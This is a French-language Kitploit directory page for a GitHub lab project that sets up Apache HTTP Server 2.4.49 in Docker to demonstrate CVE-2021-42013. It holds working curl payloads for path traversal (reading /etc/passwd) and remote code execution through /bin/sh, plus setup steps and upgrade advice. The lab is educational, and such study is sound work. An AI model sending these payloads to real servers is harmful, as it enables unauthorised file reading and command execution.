Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
apache-cve-2021-42013-lab — Travail de laboratoire démontrant la vulnérabilité d'Apache HTTP Server 2.4.49 (CVE-2021-42013) dans un environnement Docker. | Kitploit
Outils/GitHubGitHub/berraesen/apache-cve-2021-42013-lab
Sécurité des ConteneursAnalyse des VulnérabilitésExploitationExploitation d'Applications WebApprentissage et ÉducationLabs et Pratique
GitHubberraesen/apache-cve-2021-42013-lab

apache-cve-2021-42013-lab

Travail de laboratoire démontrant la vulnérabilité d'Apache HTTP Server 2.4.49 (CVE-2021-42013) dans un environnement Docker.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
7il y a 1 moisPas encore vérifié

Apache HTTP Server 2.4.49 – Traversée de chemin et exécution de code à distance (CVE-2021-42013)

À propos du projet

Dans ce projet, j'ai démontré la vulnérabilité CVE-2021-42013 présente dans Apache HTTP Server 2.4.49 dans un environnement de laboratoire que j'ai créé avec Docker.

L'objectif est d'analyser, dans un environnement contrôlé, comment la vulnérabilité se manifeste, comment elle fonctionne et quels sont ses effets sur le système.

Ce travail a été préparé uniquement à des fins éducatives et de laboratoire.

Technologies utilisées

  • Docker
  • Ubuntu 22.04
  • Apache HTTP Server 2.4.49
  • Bash
  • curl

Structure des fichiers du projet

root@kitploit:~
.
├── Dockerfile
├── index.html
└── README.md

Prérequis

Avant d'exécuter le projet, les éléments suivants doivent être installés.

  • Docker Desktop
  • Git (facultatif)

Installation

Tout d'abord, téléchargez le dépôt sur votre ordinateur.

root@kitploit:~
git clone https://github.com/berraesen/apache-cve-2021-42013-lab.git

Entrez dans le dossier.

root@kitploit:~
cd apache-cve-2021-42013-lab

Créez l'image Docker.

root@kitploit:~
docker build -t apache-2.4.49-src .

Démarrez le conteneur.

root@kitploit:~
docker run -d -p 8081:80 --name apache-src apache-2.4.49-src

Entrez dans le conteneur.

root@kitploit:~
docker exec -it apache-src /bin/bash

Vérifiez la version d'Apache.

root@kitploit:~
/usr/local/apache2/bin/httpd -v

Pour sortir du conteneur :

root@kitploit:~
exit

Vérification des modules Apache

Vous pouvez vérifier si le module CGI est activé à l'aide de la commande suivante.

root@kitploit:~
docker exec -it apache-src /usr/local/apache2/bin/apachectl -M

Activation du module CGI

root@kitploit:~
docker exec -it apache-src sed -i 's/#LoadModule cgid_module/LoadModule cgid_module/g' /usr/local/apache2/conf/httpd.conf

Ensuite, redémarrez Apache.

root@kitploit:~
docker exec -it apache-src /usr/local/apache2/bin/apachectl restart

Pour désactiver le module CGI :

root@kitploit:~
docker exec -it apache-src sed -i 's/LoadModule cgid_module/#LoadModule cgid_module/g' /usr/local/apache2/conf/httpd.conf

Puis redémarrez à nouveau.

Test de la vulnérabilité

Traversée de chemin

root@kitploit:~
curl.exe -v --path-as-is "http://localhost:8081/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd"

Exécution de code à distance

root@kitploit:~
curl.exe -v --path-as-is "http://localhost:8081/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh" --data "echo; id"

Pour afficher davantage d'informations sur le système :

root@kitploit:~
curl.exe -s --path-as-is "http://localhost:8081/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh" --data "echo; id; uname -a; whoami" -o -

Résultat attendu

Après avoir terminé l'installation :

  • Apache 2.4.49 devrait fonctionner correctement.
  • Une fois le module CGI activé, la vulnérabilité peut être observée.
  • L'accès aux fichiers système peut être démontré via la traversée de chemin.
  • On peut constater que des commandes peuvent être exécutées sur le serveur via la RCE.

Fonctionnement de la vulnérabilité

root@kitploit:~
İstemci (cURL)
      │
      ▼
Apache HTTP Server 2.4.49
      │
      ▼
URL Normalization Hatası
      │
      ▼
Path Traversal
      │
      ├──────────────► CGI Kapalı
      │                     │
      │                     ▼
      │             Dosya erişimi mümkün olabilir
      │
      ▼
CGI Aktif
      │
      ▼
/bin/sh çalıştırılabilir
      │
      ▼
Remote Code Execution (RCE)

Pour pouvoir démontrer le scénario RCE, le module mod_cgi doit être activé.

Prévention

Pour corriger cette vulnérabilité, il est recommandé de mettre à niveau Apache HTTP Server vers la version 2.4.51 ou une version plus récente. Il est également recommandé de désactiver CGI s'il n'est pas utilisé et de définir des permissions d'accès appropriées uniquement pour les répertoires nécessaires.

Télécharger l’outil